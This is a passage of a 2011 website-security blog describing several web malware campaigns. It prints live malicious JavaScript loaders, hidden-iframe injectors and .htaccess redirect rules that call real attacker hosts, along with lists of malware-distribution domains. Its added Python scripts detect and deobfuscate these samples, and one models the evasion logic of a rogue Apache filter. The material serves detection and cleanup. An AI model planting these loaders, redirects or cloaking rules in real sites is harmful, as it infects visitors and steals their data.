Posts Tagged ‘blacklist’

RokBox.js Infections

December 8th, 2011

Today’s websites make use of many third party plugins to add new functionality with the least amount of effort. Including a third party plugin also brings significant additional risk: a vulnerability in the plugin becomes a vulnerability in every website that installs it.

A prime example of this is the TimThumb malware outbreak that we discovered some time ago. In this post we discuss malware infecting another third party plugin, RokBox. At this time we have seen only a small number of websites with this issue, so we do not yet know whether a vulnerability in RokBox itself is the root cause of the infection. However, the malicious code we discuss has been found on Joomla and WordPress sites where the RokBox plugin is installed.

What does a third party plugin do?
Third party plugins allow websites to include new functionality without much effort on the part of the website owner. They can improve the management and display of images, allow the insertion of audio and video players, and in general improve the user experience.

Additionally, third party plugins are very popular among website administrators and designers because they allow good looking websites with advanced capabilities to be launched rapidly.

What is RokBox?
According to the RocketTheme website, on which RokBox is hosted, RokBox “is a mootools powered JavaScript slideshow that allows you to quickly and easily display multiple media formats including images, videos (video sharing services also) and music.” It also provides a theme management system that allows website owners to create their own custom themes and manage them. It is a successor to the RokZoom plugin. RokBox is very popular with administrators of Joomla websites.

More details about RokBox: Joomla Extensions – RokBox.

How do I identify the malicious code?
The malicious code is appended at the very end of the legitimate RokBox JavaScript file, after the Dean Edwards packed code. The strings it needs are stored as \x-escaped hex in the array _0xdc8d; decoded, they show that the code checks for an element with the id sc_co and, if it is absent, collects the visitor’s screen colour depth, width and height, the document charset, location, referrer and user agent, builds an element (named js in the code) whose src carries those values, and appends it to the document head. That second-stage script is loaded from the IP address 91.196.216.64, which is based in Russia.

A sample of the actual malware is shown below:

var _0xdc8d=["\x73\x63\x5F\x63\x6F","\x67\x65\x74\x45\x6C\x65\x6D\x65\x6E\x74\x42\x79\x49\x64","\x63\x6F\x6C\x6F\x72\x44\x65\x70\x74\x68","\x77\x69\x64\x74\x68","\x68\x65\x69\x67\x68\x74","\x63\x68\x61\x72\x73\x65\x74","\x6C\x6F\x63\x61\x74\x69\x6F\x6E","\x72\x65\x66\x65\x72\x72\x65\x72","\x75\x73\x65\x72\x41\x67\x65\
[snipped]
x43\x68\x69\x6C\x64"];element=document[_0xdc8d[1]](_0xdc8d[0]);if(!element){cls=screen[_0xdc8d[2]];sw=screen[_0xdc8d[3]];sh=screen[_0xdc8d[4]];dc=document[_0xdc8d[5]];lc=document[_0xdc8d[6]];refurl=escape(document[_0xdc8d[7]]);ua=escape(navigator[_0xdc8d[8]]);var js=document[_0xdc8d[10]](_0xdc8d[9]);js[_0xdc8d[11]]=_0xdc8d[0];js[_0xdc8d[12]]=_0xdc8d[13]+refurl+_0xdc8d[14]+cls+_0xdc8d[15]+sw+_0xdc8d[16]+sh+_0xdc8d[17]+dc+_0xdc8d[18]+lc+_0xdc8d[19]+ua;var head=document[_0xdc8d[21]](_0xdc8d[20])[0];head[_0xdc8d[22]](js);} ;

A sample of the benign RokBox code is shown below:

/**
* RokBox System Plugin
*
* @package		Joomla
* @subpackage	RokBox System Plugin
* @copyright Copyright (C) 2009 RocketTheme. All rights reserved.
* @license http://www.gnu.org/copyleft/gpl.html GNU/GPL, see RT-LICENSE.php
* @author RocketTheme, LLC
*
* RokBox System Plugin includes:
* ------------
* SWFObject v1.5: SWFObject is (c) 2007 Geoff Stearns and is released under the MIT License:
* http://www.opensource.org/licenses/mit-license.php
* -------------
* JW Player: JW Player is (c) released under CC by-nc-sa 2.0:
* http://creativecommons.org/licenses/by-nc-sa/2.0/
*
*/

eval(function(p,a,c,k,e,d){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--){d[e(c)]=k[c]||e(c)}k=[function(e){return d[e]}];e=function(){return'\\w+'};

Is my site infected?
To find out whether your site is infected, search for files that contain all three of the strings “_0xdc8d”, “refurl” and “\x63”. Any one of them alone is not conclusive (\x63 is simply the hex escape for the letter c and appears in plenty of legitimately minified code); it is the combination in a single file, and in particular in a file that should contain nothing but the packed RokBox code, that matters. Tools like grep or WinGrep can run the search across a whole document root. Further, make sure that all of your plugins and your WordPress or Joomla installation are up to date, and change all of your access credentials (FTP, CMS administrator and hosting control panel) once the site is clean.
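
As an added example (not code from the original post), here is a small Python triage script that performs the check above on a file’s contents and decodes the \x-escaped string array so you can see what the loader touches. The sample input is the start of the obfuscated code quoted above; the array is cut short there, so only its first eight strings decode.

```python
import re

# Constructed sample: the opening of the obfuscated loader quoted above, as a
# raw string so the \xNN escapes stay literal the way they sit in the file.
# The array in the real file is longer; the post snipped it.
ROKBOX_SAMPLE = (
    r'var _0xdc8d=["\x73\x63\x5F\x63\x6F","\x67\x65\x74\x45\x6C\x65\x6D\x65\x6E'
    r'\x74\x42\x79\x49\x64","\x63\x6F\x6C\x6F\x72\x44\x65\x70\x74\x68","\x77\x69'
    r'\x64\x74\x68","\x68\x65\x69\x67\x68\x74","\x63\x68\x61\x72\x73\x65\x74",'
    r'"\x6C\x6F\x63\x61\x74\x69\x6F\x6E","\x72\x65\x66\x65\x72\x72\x65\x72"];'
    r'element=document[_0xdc8d[1]](_0xdc8d[0]);refurl=escape(document[_0xdc8d[7]]);'
)

# The three strings the post says must all be present in one file.
INDICATORS = ("_0xdc8d", "refurl", r"\x63")

HEX_ESCAPE = re.compile(r"\\x([0-9A-Fa-f]{2})")


def decode_hex_escapes(s):
    """Replace JavaScript \\xNN escapes with the characters they encode."""
    return HEX_ESCAPE.sub(lambda m: chr(int(m.group(1), 16)), s)


def decode_string_array(js, name):
    """Decode every element of `var <name>=[ ... ];`; [] if the array is absent."""
    m = re.search(r"var\s+%s\s*=\s*\[(.*?)\];" % re.escape(name), js, re.S)
    if not m:
        return []
    elems = re.findall(r'"((?:[^"\\]|\\.)*)"', m.group(1))
    return [decode_hex_escapes(e) for e in elems]


def matches_indicators(text):
    """True only when all three indicators co-occur, as the post recommends."""
    return all(ind in text for ind in INDICATORS)


def triage(text):
    """Verdict plus the decoded strings, so an analyst sees what the loader touches."""
    return {"infected": matches_indicators(text),
            "strings": decode_string_array(text, "_0xdc8d")}


if __name__ == "__main__":
    result = triage(ROKBOX_SAMPLE)
    print("infected:", result["infected"])
    for s in result["strings"]:
        print("  ", s)
```

Run it over each .js file under the document root; a hit should list DOM and browser-fingerprint names (getElementById, colorDepth, referrer and so on) that have no business being hex-escaped in a slideshow plugin.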

How do I protect my site?
Webmasters and administrators should search for every instance of the malware (including malicious links, iframes and scripts) on their sites and remove all occurrences. More importantly, it is critical to monitor your website continuously for compromise: you need to know quickly when your website has been compromised so that your visitors and your online reputation are not harmed.

StopTheHacker.com customers are protected against these kind of threats. If you would like more information on how to protect your website, please feel free to contact us. You can also visit our services page to protect your website right now.

Till next time…

News, Report, Security

osCommerce Attacks

November 7th, 2011

Malicious hackers are always looking to exploit software used by website owners to power their websites. One popular type of application that malicious hackers target is shopping carts, like osCommerce. This allows them to compromise a large number of websites using the software, infecting the visitors to these sites with malware.

We have described how malicious hackers exploit osCommerce installations in a past article. This post details a new piece of malware that is affecting osCommerce websites.

The attack
Shopping carts like osCommerce are prime targets for malicious hackers: they are widely used, they store a great deal of sensitive information, and they are a convenient vector for embedding malware on a website to infect visitors and customers.

A recent trend is to display fake Anti-Virus pop up advertisements to visitors of a site when they land on an infected webpage. The following websites are being used to distribute the fake Anti-Virus malware.

Sites distributing the malware:

roybeth.com
schenkenbrunn.at
puremojofoto.com
pindating.com
nadobolchetrafa.cx.cc

Compromised websites in the wild
One example of a site infected with this specific malware is www.surfmonster.co.uk. Take a look at the code below to see how the malware has been appended to the site’s JavaScript. Note the decoy: ss is first set to the Google-hosted jQuery URL and immediately reassigned to roybeth.com, so only the second value is ever loaded, but a quick grep for googleapis makes the snippet look like a legitimate jQuery loader. In this sample the loader has been appended four times in a row.

A sample of the actual malware:

var i,s,ss="http://ajax.googleapis.com/ajax/libs/jquery/1.5.1/jquery.min.js",ss="http://roybeth.com/ext/jquery.php";try { s=document.createElement("script"); s.src=ss; document.body.appendChild( s ); } catch(erst){ }

A more detailed description of how the malware is appended is presented in one of our previous posts.

      this.hook.enabled = 1;

        // Cache so updates are infrequent.
        tiles.old = {
                w: elmW,
                h: elmH,
                x: bgX,
                y: bgY,
                r: bgR
        };
};
var i,s,ss="http://ajax.googleapis.com/ajax/libs/jquery/1.5.1/jquery.min.js",ss="http://roybeth.com/ext/jquery.php"; try { s=document.createElement("script"); s.src=ss; document.body.appendChild(s); } catch(erst) { }var i,s,ss="http://ajax.googleapis.com/ajax/libs/jquery/1.5.1/jquery.min.js",ss="http://roybeth.com/ext/jquery.php"; try { s=document.createElement("script"); s.src=ss; document.body.appendChild(s); } catch(erst) { }var i,s,ss="http://ajax.googleapis.com/ajax/libs/jquery/1.5.1/jquery.min.js",ss="http://roybeth.com/ext/jquery.php"; try { s=document.createElement("script"); s.src=ss; document.body.appendChild(s); } catch(erst) { }var i,s,ss="http://ajax.googleapis.com/ajax/libs/jquery/1.5.1/jquery.min.js",ss="http://roybeth.com/ext/jquery.php"; try { s=document.createElement("script"); s.src=ss; document.body.appendChild(s); } catch(erst) { }

Recommended steps
First, remove the malware. Then upgrade your installation of osCommerce and analyze your website for application vulnerabilities. Additionally, restricting the permissions on your “admin” directory, or renaming it to something other than the default, can mitigate automated attacks.

How do I protect my site?
Malicious hackers are constantly changing their tactics in order to evade detection and to continue to infect unsuspecting users. It is imperative to keep up-to-date on the latest ways that infections are spreading to legitimate websites.

StopTheHacker.com customers are protected against these kind of threats. If you would like more information on how to protect your website, please feel free to contact us. You can also visit our services page to protect your website now.

Till next time…

Report, Security

Blogutils.net Tumblr Hack

September 25th, 2011

A recent spate of hacking incidents has led to the compromise of the popular website blogutils.net. Blogutils.net provides website utilities like visit counters that can be embedded on websites built using popular software.

Many websites, including some blogs hosted on tumblr.com, have recently been blacklisted by Google. The primary reason is the compromise of blogutils.net, which has allowed malware to be distributed through these otherwise benign sites via utilities like the visit counters that websites around the world embed.

Website names on tumblr.com have the following format:

some-name.tumblr.com

About the attack
Websites affected by this problem may see, via malicious iframes and redirections, links to malware sites such as the one listed below.

dbncawbp.cz.cc

A screenshot of the blogutils.net website being blacklisted by Google is shown below.

How to remove the malicious code
If you are facing this problem on your site, remove the blogutils.net code (e.g. a visitor counter) for the time being. When blogutils.net has recovered from the attack you may re-enable the utility code on your website.

We will post more details in forthcoming posts.

How do I protect my site?
StopTheHacker.com customers are protected against these kind of threats. If you would like more information on how to protect your website, please feel free to contact us. You can also visit our services page to protect your website now.

Till next time…

Report, Security

Google Acknowledges Challenges in Detecting Web-Malware

August 18th, 2011

Google announced today that the fight to detect web-based malware is far from over. The problem is growing and changing every day. Websites must be protected to prevent the spread of web-based malware.

From the Article

Google issued a new study on Wednesday detailing how it is becoming more difficult to identify malicious websites and attacks, with antivirus software proving to be an ineffective defense against new ones.

Read More: Google highlights trouble in detecting Web-based malware

How do I protect my site?
StopTheHacker.com customers are protected against these kind of threats. If you would like more information on how to protect your website, please feel free to contact us. You can also visit our services page to protect your website now.

Till next time…

News, Security

Koobface Malware Detection

June 13th, 2011

Malware authors are constantly coming up with new ways to compromise web sites. Malicious hackers have now turned their attention to the weakest link in the security chain, web sites, breaking in and then using them to distribute malware. The infected PCs are in turn recruited into botnets.

Customer data and the reputation of the web site and the online business are at stake. In this article we highlight a piece of malware first detected back in 2008 that hackers are still using, spreading through Facebook and other social networking portals and infecting web sites along the way. We show some samples of the malware which can be used to identify infected websites spreading Koobface, and what hosting companies and website owners can do to stop it.

What is Koobface?
Koobface is a computer worm. It targets users of social networks such as Facebook, hence the name (an anagram of Facebook). This piece of malware is extremely prevalent; the details are discussed below. Interestingly, it uses a mechanism we have blogged about extensively in the past: stealing FTP credentials for websites along with login credentials for Facebook and other social networking portals. Users on Windows, Mac and, to an extent, Linux are affected.

Koobface is Not New
It was detected way back in 2008, with new variations coming in 2009 and later. Once this malware successfully infects a clients machine, it can join a command and control channel or communicate peer-to-peer with other infected PCs or “bots.” This malware hijacks user search results, displays ads for Fake Anti-Virus products, and more.

How it Operates
Koobface sends messages to “friends” of the user whose profile has been compromised. Once the recipient opens the message and clicks on the links, the unsuspecting user is sent to an infected website where they are asked to download malicious software posing as an Adobe Flash player update.

Once the recipient of the message installs the malicious “update,” Koobface can now hijack their search queries, prevent the infected client’s browser from navigating to well known security websites (a DNS filter module is also downloaded), and send them to other infected websites. The unsuspecting user’s PC is now compromised.

Koobface has been given various names by Anti-Virus companies:

  • Worm:Win32/Koobface.gen!F
  • Net-Worm.Win32.Koobface.a (which attacks MySpace)
  • Net-Worm.Win32.Koobface.b (which attacks Facebook)
  • WORM_KOOBFACE.DC (which attacks Twitter)
  • W32/Koobfa-Gen (which attacks Facebook, MySpace, hi5, Bebo, Friendster, myYearbook, Tagged, Netlog, Badoo and fubar)
  • W32.Koobface.D
  • and others…

Security Implications
The Koobface malware will attempt to steal FTP credentials for your websites and login information for Facebook and other accounts. As a second step, your websites will be infected with the malware shown below. Finally, the malware installed on your websites will attempt to infect all your visitors, subsequently destroying the reputation of your website, driving away potential customers and lowering revenue.

The malware also posts malicious entries on your Facebook wall, using your profile to spread malware in social networks. This makes you an unwilling party to the infection of your friends and others who click on links in your profile and emails sent from your account.

Signs of Compromise (Server Side)
Infected websites spreading Koobface usually have a piece of obfuscated JavaScript inserted near the HTML HEAD tag, used to redirect a visitor to the website which hosts the actual malicious payload. When Koobface infects a website it creates a directory on the server with a name such as “police” or “copper”.

Interestingly, we have found that the string “kroteg” is present on infected sites. This has also been confirmed by other security researchers.

The code in the HEAD section of the web page is similar to the following. Note the obfuscation style: the replace() call strips filler letters, so the second variable evaluates to “cum” and, joined with the first, to “docum”; the script assembles names such as “document” piece by piece so that a plain string search does not find them:

d7h1db='do';d2akka91="cburnkmfji".replace(/[bnrkfji]+/g,"");

A URL to the infected page would look similar to:

http://www.compromisedsite.com/police/?go

An example blacklisted site (Live):

http://www.sfighters.yoyo.pl/freevideo/?go

How to Detect Infection (Client Side)
Several anti-virus products detect this malware on the client side under the names listed above.

Steps to Take
At StopTheHacker, we are tracking our detection of this malware as it affects web sites and servers on the Internet and working to prevent its spread to stop millions of accounts from being compromised.

All website administrators should search for new unrecognized files and directories, new SWF files, and files containing the string “kroteg” on the server.
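
An added example, not code from the original post: a Python scan that walks a document root for the server-side indicators listed above (directories named police or copper, SWF files, and files containing kroteg) and also undoes the replace()-based string obfuscation seen in the HEAD snippet. The sample tree it builds in a temporary directory is constructed for the demonstration; the file names and contents are assumptions.

```python
import os
import re
import tempfile

SUSPECT_DIRS = {"police", "copper"}   # directory names the post associates with Koobface
MARKER = b"kroteg"                    # string reported on infected sites
HEAD_SNIPPET = 'd7h1db=\'do\';d2akka91="cburnkmfji".replace(/[bnrkfji]+/g,"");'


def build_sample_tree():
    """Constructed docroot for the demo; names and contents are assumptions."""
    root = tempfile.mkdtemp(prefix="docroot-")
    files = {
        "index.html": "<html><head><title>ok</title></head><body>hello</body></html>",
        "about.html": "<html><head><script>%s</script></head><body>kroteg</body></html>" % HEAD_SNIPPET,
        "police/index.php": "<?php /* placeholder dropped in the random directory */ ?>",
        "images/banner.swf": "FWS placeholder",
    }
    for rel, body in files.items():
        path = os.path.join(root, rel)
        os.makedirs(os.path.dirname(path), exist_ok=True)
        with open(path, "w", encoding="utf-8") as fh:
            fh.write(body)
    return root


def scan_tree(root):
    """Walk a docroot and return sorted (reason, relative path) findings."""
    findings = []
    for dirpath, dirnames, filenames in os.walk(root):
        for d in dirnames:
            if d.lower() in SUSPECT_DIRS:
                rel = os.path.relpath(os.path.join(dirpath, d), root).replace(os.sep, "/")
                findings.append(("suspect-dir", rel))
        for f in filenames:
            full = os.path.join(dirpath, f)
            rel = os.path.relpath(full, root).replace(os.sep, "/")
            if f.lower().endswith(".swf"):
                findings.append(("swf-file", rel))
            with open(full, "rb") as fh:
                if MARKER in fh.read():
                    findings.append(("kroteg-marker", rel))
    return sorted(findings)


def unfilter(source, drop):
    """Undo the '<string>.replace(/[chars]+/g,"")' trick from the HEAD snippet."""
    return re.sub("[%s]+" % re.escape(drop), "", source)


if __name__ == "__main__":
    root = build_sample_tree()
    for reason, path in scan_tree(root):
        print("%-14s %s" % (reason, path))
    print("'do' + unfilter('cburnkmfji', 'bnrkfji') =", "do" + unfilter("cburnkmfji", "bnrkfji"))
```

On a real host, point scan_tree at the document root and compare the directory list against a known-good inventory; a directory with a plausible name that nobody created is the finding, so the SUSPECT_DIRS set is only a starting point.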

We Can Help!
If you want to protect your site from infection, or you need additional support, sign up for one of our services. Please contact us with your comments or questions.

Report, Security

Apache Used to Inject Malware

May 23rd, 2011

Malware authors are constantly coming up with new ways to compromise web sites. Malicious hackers have now turned to the weakest link in the security chain, web sites, breaking in and then using them to distribute malware to visitors. The infected PCs are then used to form botnets. Customer data and the reputation of the web site and the online business are at stake. In this article we highlight a relatively new way in which hackers infect websites.

Apache Filter Based Malware
We have recently noted a new development in the world of web malware: malicious hackers have begun using the Apache web server’s filter mechanism to inject malware into web pages as they are served. The process works much like having the mailman stick a piece of gum (unlikely in real life) on the nice, clean envelope you put into the mailbox. The recipient might complain to you about the gum (the malware), and most people would be at a loss to determine whether it came from you.

This is exactly the confusion malicious hackers capitalize on. Apache is one of the most popular web servers in use today: flexible, scalable and very reliable, which is why it is a good choice for webmasters, web hosts and website owners. Malicious hackers are banking on the popularity of Apache to give them the most bang for the buck.

Apache, through its output filter API, lets a module analyze and modify response data in real time as it is sent to the client. If you wanted to add an advertisement to every page served from the web server, for example, this functionality would be of great use. Now filters are being abused by malicious hackers: a rogue filter inserts a piece of malware containing an iframe like the one below into otherwise clean responses.

This piece of malware leads to a fake AV site:

iframe src="http://crocabhysanr4.cz.cc/[scrubbed]"

Even though this is a relatively recent problem, researchers at Symantec have also reported on the same issue.

Nuances
To clarify, this new kind of malware injection does not mean that Apache itself is compromised or has a vulnerability. The filter functionality is a legitimate feature that is being abused by malicious hackers who have already gained enough unauthorized access to the server to load a module into the web server. The attack is extremely effective, since it can “infect” every page on the web server without changing a single file under the document root: the files on disk stay clean and only the responses are altered.

In the past there has been other .htaccess-based malware which tries to evade detection by serving infected pages only when a user arrives at the compromised site via a search engine like Google. This malware is much more sophisticated. It injects code into outgoing HTML pages from the web server, but only according to the following rules.

The malware is not injected into outgoing webpages if:

  • The incoming HTTP request is coming from an IP which belongs to a search engine
  • The incoming HTTP request is coming from certain browser User Agents
  • The administrator is logged in or an administrator owned process is running

Additionally, the very first time a user requests a page, a session token is created for the connection, but the malware is not delivered on this first request. It is delivered the second time the same user, with the same session, requests a web page. Interestingly, the process serves the malware only once and then adds the user’s IP address to a list so that it does not try to infect the same host again. This reduces the chance of detection by anti-virus, and it also defeats any scanner, crawler or curl invocation that fetches each page once.
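
To make the delivery rules concrete, here is an added Python model of the rogue filter’s decision logic as the post describes it. It is not the attackers’ code and not an Apache module; the IP prefix, user-agent list and injected marker are assumptions chosen for the demonstration.

```python
from dataclasses import dataclass, field

# Assumptions for the demonstration, not values from a real sample:
SEARCH_ENGINE_PREFIXES = ("66.249.",)                 # a crawler address range
SKIPPED_USER_AGENTS = ("googlebot", "bingbot", "curl", "wget")
INJECTED_MARKER = '<iframe src="http://fakeav.invalid/[scrubbed]"></iframe>'


@dataclass
class Request:
    ip: str
    user_agent: str
    session: str          # session cookie; the filter issues one on first contact


@dataclass
class FilterState:
    """What the rogue output filter remembers between requests."""
    sessions_seen: set = field(default_factory=set)
    ips_served: set = field(default_factory=set)
    admin_logged_in: bool = False


def should_inject(req, state):
    """Apply the post's rules in order; True means the response gets the payload."""
    if state.admin_logged_in:
        return False                              # stay invisible to the owner
    if req.ip.startswith(SEARCH_ENGINE_PREFIXES):
        return False                              # never show crawlers the payload
    if any(ua in req.user_agent.lower() for ua in SKIPPED_USER_AGENTS):
        return False                              # nor scanners and command-line tools
    if req.session not in state.sessions_seen:
        state.sessions_seen.add(req.session)      # first request: issue token, serve clean
        return False
    if req.ip in state.ips_served:
        return False                              # one payload per address, then quiet
    state.ips_served.add(req.ip)
    return True


def serve(html_on_disk, req, state):
    """Output filter: the file is untouched, only this response is altered."""
    if should_inject(req, state):
        return html_on_disk.replace("</body>", INJECTED_MARKER + "</body>")
    return html_on_disk


def demo():
    """Sequence of fetches against one server; returns whether each was infected."""
    state = FilterState()
    page = "<html><body>clean page</body></html>"
    visitor = Request("203.0.113.5", "Mozilla/5.0 (Windows NT 6.1) Firefox/4.0", "sess-1")
    crawler = Request("66.249.1.2", "Mozilla/5.0 (compatible; Googlebot/2.1)", "sess-2")
    scanner = Request("198.51.100.7", "curl/7.21", "sess-3")
    fetches = [visitor, visitor, visitor, crawler, crawler, scanner, scanner]
    return [INJECTED_MARKER in serve(page, r, state) for r in fetches]


if __name__ == "__main__":
    print(demo())
```

The demo returns one True, for the visitor’s second request, and False for everything else. To reproduce the injection as a defender, make two requests in the same session from a browser-like user agent and from an address the module has not served yet, then diff the second response against the file on disk; a single fetch, a crawler, or curl with its default user agent all see the clean page.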

We Can Help!
If you want to protect your site from infection, or you need additional support, please sign up for one of our services. Please contact us with your comments or questions.

Report, Security

Malware Faking Google (g-oogl-e.com)

May 10th, 2011

Malicious hackers are compromising websites in droves. Over 6,600 websites are hacked every day and begin distributing malware to potential customers and visitors, destroying their owners’ online reputation.

In the vast majority of cases, affected website owners are completely oblivious to the fact that a malicious hacker has used their website to infect their visitors. In this article, we will discuss a new strain of malware that has already infected thousands of legitimate websites (at least 1,163, at last count, are affected by g-oogl-e.com).

What does this attack do?
This particular attack infects the .htaccess file on web servers and redirects visitors to sites serving malware.

One particular website used to spread the malware is g-oogl-e.com, which plays on the google.com domain name in order to trick unsuspecting visitors into trusting the site. See below for a list of the malware host sites and their associated internet addresses (IPs).

Malware hosts:

g-oogl-e.com            91.201.66.38
12583497154.ru          46.252.129.0
uploadfriends2010.ru    91.216.122.0

Take Action
Administrators and website owners need to protect the reputation of their websites. As a first step, you must remove the malicious configuration from your “.htaccess” and “index.php” files on your hosting account.

If you choose not to take action, visitors to your website and potential customers may be infected with malware, your website will be blacklisted by search engines like Google, Bing and Yahoo, and your reputation and revenue will take a nosedive.

A compromised “.htaccess” file will have entries that look like the ones below:

RewriteEngine On
RewriteCond %{HTTP_REFERER} .*gooo?gle.* [OR]
RewriteCond %{HTTP_REFERER} .*ask.* [OR]
RewriteCond %{HTTP_REFERER} .*yahoo.* [OR]
RewriteCond %{HTTP_REFERER} .live. [OR]
RewriteCond %{HTTP_REFERER} .twitter. [OR]
RewriteCond %{HTTP_REFERER} .linkedin. [OR]
RewriteCond %{HTTP_REFERER} .myspace. [OR]
RewriteRule .* http://g-oogl-e.com [R,L]

The malicious redirects found in “.htaccess” files on compromised website accounts must be deleted. Note that every condition above tests the Referer header, so the rule fires only for visitors arriving from a search engine or social network; the site owner, who types the address directly, never sees the redirect. When checking a site, request a page with a Referer such as http://www.google.com/ set, or click through from a search result. The patterns are also loose: .*ask.* matches any referring URL that contains “ask”, not just ask.com.
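
An added Python example, not part of the original post: it parses an .htaccess file, flags RewriteRule blocks that key on the Referer and send visitors to a foreign host, and evaluates the conditions the way mod_rewrite does (conditions joined with [OR] form one group; groups are ANDed) so you can see which referrers trigger the redirect. The sample is the rewrite block above; the site host is an assumption.

```python
import re
from urllib.parse import urlsplit

# The rewrite block quoted above, embedded as the sample input.
HTACCESS_SAMPLE = """\
RewriteEngine On
RewriteCond %{HTTP_REFERER} .*gooo?gle.* [OR]
RewriteCond %{HTTP_REFERER} .*ask.* [OR]
RewriteCond %{HTTP_REFERER} .*yahoo.* [OR]
RewriteCond %{HTTP_REFERER} .live. [OR]
RewriteCond %{HTTP_REFERER} .twitter. [OR]
RewriteCond %{HTTP_REFERER} .linkedin. [OR]
RewriteCond %{HTTP_REFERER} .myspace. [OR]
RewriteRule .* http://g-oogl-e.com [R,L]
"""

SITE_HOST = "www.example.com"   # assumed: the host whose .htaccess is being checked


def parse_rules(text):
    """Group each RewriteRule with the RewriteCond lines that precede it."""
    rules, conds = [], []
    for line in text.splitlines():
        parts = line.split()
        if not parts or parts[0].startswith("#"):
            continue
        if parts[0] == "RewriteCond" and len(parts) >= 3:
            flags = parts[3] if len(parts) > 3 else ""
            conds.append({"var": parts[1], "pattern": parts[2], "or": "OR" in flags})
        elif parts[0] == "RewriteRule" and len(parts) >= 3:
            rules.append({"pattern": parts[1], "target": parts[2], "conds": conds})
            conds = []
    return rules


def referrer_redirects(rules, site_host=SITE_HOST):
    """Rules that test HTTP_REFERER and send the visitor to a different host."""
    bad = []
    for rule in rules:
        host = urlsplit(rule["target"]).hostname
        tests_referrer = any(c["var"] == "%{HTTP_REFERER}" for c in rule["conds"])
        if tests_referrer and host and host != site_host:
            bad.append(rule)
    return bad


def would_redirect(rule, referrer):
    """Evaluate the conditions as mod_rewrite does: an [OR] chain is one group
    that passes if any member matches; separate groups are ANDed."""
    groups, current = [], []
    for c in rule["conds"]:
        current.append(re.search(c["pattern"], referrer) is not None)
        if not c["or"]:
            groups.append(any(current))
            current = []
    if current:
        groups.append(any(current))
    return all(groups)


if __name__ == "__main__":
    for rule in referrer_redirects(parse_rules(HTACCESS_SAMPLE)):
        print("redirects to", rule["target"])
        for ref in ("", "http://www.google.com/search?q=shoes", "http://www.bing.com/",
                    "http://www.alaska.gov/"):
            print("  referer %-40r -> %s" % (ref, would_redirect(rule, ref)))
```

The alaska.gov line is there on purpose: the attackers’ .*ask.* pattern fires on it, which is one reason victims report the redirect as intermittent.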

We Can Help!
If you need additional support, please see if our services can help and feel free to contact us with any comments or questions.

News, Report, Security

prw1.co.cc Malware Alert

April 25th, 2011

Malicious hackers are infecting websites in droves using a relatively new kind of malware. Websites are the newest malware battleground. Benign websites are being compromised and infected by hackers in order to infect their visitors.

In the vast majority of cases, the affected website owners are completely oblivious to the fact that a malicious hacker has used their website to infect their visitors. In this article we will show a new strain of malware that has already infected 43,000 websites.

Identifying the Malware
The specific piece of malware:

y='rum';n='s';fp='afe';e='tp';bo='/f';lk='o.c';bl='742';x='7';i='ra';h='c';gf='.';fl='ht';q='//';w='c';pu='554';mk='p?';qg='tp=';il='ph';yy='o';am='5e';k='.c';c='me';u='r';d='20a';qd='1';z='prw';xu='if';iy='a';f=':';a=xu.concat(i,c);kx=n.concat(u,h);l=fl.concat(e,f,q,z,qd,k,lk,w,bo,yy,y,gf,il,mk,qg,bl,d,am,pu,fp,iy,x);var ov=document.createElement(a);ov.setAttribute('width','5');ov.setAttribute('height','5');ov.setAttribute('style','display:none');ov.setAttribute(kx,l);document.body.appendChild(ov);lb='r';r='d3b';q='.c';b='or';v='e';bi='e30';gl='?';j='c/f';ru='l';pj='a';zh='m.';h='a';xc='me';i='c';z='tp:';n='4';ye='=';lg='s';qk='426';jp='ht';g='a';k='z';ut='u';c='//p';pr='7f';o='i';by='fr';ck='3';pl='php';pe='tp';e='a';nc='.co';gz=o.concat(by,h,xc);kx=lg.concat(lb,i);dv=jp.concat(z,c,k,ru,ck,nc,q,j,b,ut,zh,pl,gl,pe,ye,v,pj,r,e,qk,pr,bi,g,n);var bo=document.createElement(gz);bo.setAttribute('width','5');bo.setAttribute('height','5');bo.setAttribute('style','display:none');bo.setAttribute(kx,dv);document.body.appendChild(bo);

This malware adds a hidden 5x5 pixel iframe (style set to display:none) to the infected web page, with its src attribute set to:

http://prw1.co.cc/forum.php?tp=74220a5e554afea7

The snippet builds two such iframes; between them they point to two sites which load the code used to infect the website visitor:

pzl3.co.cc/forum.php?tp=ead3ba4267fe30a4
prw1.co.cc/forum.php?tp=74220a5e554afea7
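
An added Python deobfuscator, not from the original post, that recovers the URLs without running the script: it replays the fragment assignments in order and resolves each .concat() call, which is all the snippet does before calling setAttribute. The input is the malware sample quoted above.

```python
import re

# The obfuscated snippet from the post, split only for readability.
PRW1_SAMPLE = (
    "y='rum';n='s';fp='afe';e='tp';bo='/f';lk='o.c';bl='742';x='7';i='ra';h='c';"
    "gf='.';fl='ht';q='//';w='c';pu='554';mk='p?';qg='tp=';il='ph';yy='o';am='5e';"
    "k='.c';c='me';u='r';d='20a';qd='1';z='prw';xu='if';iy='a';f=':';"
    "a=xu.concat(i,c);kx=n.concat(u,h);"
    "l=fl.concat(e,f,q,z,qd,k,lk,w,bo,yy,y,gf,il,mk,qg,bl,d,am,pu,fp,iy,x);"
    "var ov=document.createElement(a);ov.setAttribute('width','5');"
    "ov.setAttribute('height','5');ov.setAttribute('style','display:none');"
    "ov.setAttribute(kx,l);document.body.appendChild(ov);"
    "lb='r';r='d3b';q='.c';b='or';v='e';bi='e30';gl='?';j='c/f';ru='l';pj='a';"
    "zh='m.';h='a';xc='me';i='c';z='tp:';n='4';ye='=';lg='s';qk='426';jp='ht';"
    "g='a';k='z';ut='u';c='//p';pr='7f';o='i';by='fr';ck='3';pl='php';pe='tp';"
    "e='a';nc='.co';gz=o.concat(by,h,xc);kx=lg.concat(lb,i);"
    "dv=jp.concat(z,c,k,ru,ck,nc,q,j,b,ut,zh,pl,gl,pe,ye,v,pj,r,e,qk,pr,bi,g,n);"
    "var bo=document.createElement(gz);bo.setAttribute('width','5');"
    "bo.setAttribute('height','5');bo.setAttribute('style','display:none');"
    "bo.setAttribute(kx,dv);document.body.appendChild(bo);"
)

# name='literal' and name=base.concat(a,b,...) are the only statement shapes the
# snippet uses to build strings; everything else is DOM work we can ignore.
ASSIGN_LIT = re.compile(r"^(?:var\s+)?(\w+)\s*=\s*(['\"])(.*?)\2$")
ASSIGN_CAT = re.compile(r"^(?:var\s+)?(\w+)\s*=\s*(\w+)\.concat\(([\w\s,]*)\)$")


def evaluate(js):
    """Replay the assignments in order. Returns (final env, concat results in order)."""
    env, concats = {}, []
    for stmt in js.split(";"):
        stmt = stmt.strip()
        m = ASSIGN_LIT.match(stmt)
        if m:
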